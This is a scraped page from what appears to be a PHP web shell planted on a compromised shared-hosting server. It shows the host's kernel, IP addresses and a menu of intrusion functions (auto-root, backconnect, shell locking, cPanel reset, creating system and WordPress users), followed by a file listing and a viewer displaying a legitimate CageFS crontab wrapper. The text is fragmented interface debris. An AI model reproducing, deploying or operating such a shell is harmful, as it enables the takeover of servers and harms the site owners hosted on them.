Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.145.18.135
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
.build-id /
fe /
[ HOME SHELL ]
Name
Size
Permission
Action
0b8477af6553918722070ae3ed3c60...
56.88
KB
-rwxr-xr-x
1bcaa1339d33cad50a70d2723c90a4...
183.5
KB
-rwxr-xr-x
1c44834f3537dffe87f15c8ad0c154...
315.16
KB
-rwxr-xr-x
1d3ae274346d8e40d5e4ab16774aee...
638.05
KB
-rwxr-xr-x
209bef27f8b860bf9e9fc4df3e05b6...
23.52
KB
-rwxr-xr-x
2d84b279df6d2ae4173d672e749b74...
133.27
KB
-rwxr-xr-x
2f8563d3ec9b2c7d348e260c015eb2...
1.36
KB
-rwxr-xr-x
35b3391c6826104262fa8243388032...
82.91
KB
-rwxr-xr-x
4039c56a588dea7312e7e6fa91e515...
15.37
KB
-rwxr-xr-x
421e2f7579952493ef111ead4f8df4...
328.89
KB
-rwxr-xr-x
504b06eec7d853b54c5009870a6d32...
23.52
KB
-rwxr-xr-x
7967e886a8edc6c7e15421a8e3564c...
11.46
KB
-rwxr-xr-x
7c83deb7cf938f7807ee7acf0e2faa...
15.59
KB
-rwxr-xr-x
8a15a1671f8bce237b3a467000d662...
191.49
KB
-rwxr-xr-x
8abcd9b89dbf258179373bfffa24bc...
287.58
KB
-rwxr-xr-x
8b4707725d427bd758859ce8862d3d...
19.79
KB
-rwxr-xr-x
9236b1eb5f021123500aa5249b1bc5...
11.68
KB
-rwxr-xr-x
93807e310e65e827f184ab52b32a23...
6.76
MB
-rwxr-xr-x
9ec9a9b47f9250794c75e062457079...
41.52
KB
-rwxr-xr-x
a418fa6c2cd28e433fe61e9b8ee56e...
128.08
KB
-rwxr-xr-x
b3356342088c5b7dda898af387e3ed...
45.55
KB
-rwxr-xr-x
ca3feabdde35e5dda4c636d1d96e37...
11.99
KB
-rwxr-xr-x
d05452661348bc5b345368e6d10cf4...
36.27
KB
-rwxr-xr-x
f5956becdfc7d8fceee45de429dd6d...
6.81
MB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 2f8563d3ec9b2c7d348e260c015eb237574379
#!/bin/bash ##CageFS proxyexec wrapper - ver 17 if [[ $EUID -eq 0 ]]; then echo 'Cannot be run as root' exit 1 fi USR=`/usr/bin/whoami` CWD=`pwd` TOKEN=`/bin/cat /var/.cagefs/.cagefs.token` # It's user's tmp directory and write to it is secure procedure # because this script is running only under usual user LOCKFILE=/tmp/.crontab.lock FD=`ulimit -n` (( FD -= 1 )) if [[ -e /var/.cagefs/origin ]]; then ORIGIN=`/bin/cat /var/.cagefs/origin` REMOTE="/usr/bin/ssh -F /etc/ssh/cagefs-rexec_config $USR@$ORIGIN" else REMOTE="" fi eval "( /usr/bin/flock -x -w 10 $FD || exit 1 echo -n \"\" | $REMOTE CAGEFS_TOKEN="$TOKEN" /usr/sbin/proxyexec -c cagefs.sock \"$USR\" \"$CWD\" CRONTAB_CHECK $$ ) $FD> $LOCKFILE" [ $? -ne 0 ] && exit 1 eval "( /usr/bin/flock -x -w 10 $FD || exit 1 $REMOTE CAGEFS_TOKEN="$TOKEN" /usr/sbin/proxyexec -c cagefs.sock \"$USR\" \"$CWD\" CRONTAB_LIST $$ 2>/dev/null |cat > /var/spool/cron/$USR ) $FD> $LOCKFILE" /usr/bin/crontab.cagefs $@ eval "( /usr/bin/flock -x -w 10 $FD || exit 1 if [ -e /var/spool/cron/$USR ]; then cat /var/spool/cron/$USR | $REMOTE CAGEFS_TOKEN="$TOKEN" /usr/sbin/proxyexec -c cagefs.sock \"$USR\" \"$CWD\" CRONTAB_SAVE $$ 2>/dev/null else echo -n \"\" | $REMOTE CAGEFS_TOKEN="$TOKEN" /usr/sbin/proxyexec -c cagefs.sock \"$USR\" \"$CWD\" CRONTAB_SAVE $$ 2>/dev/null fi ) $FD>$LOCKFILE"
Close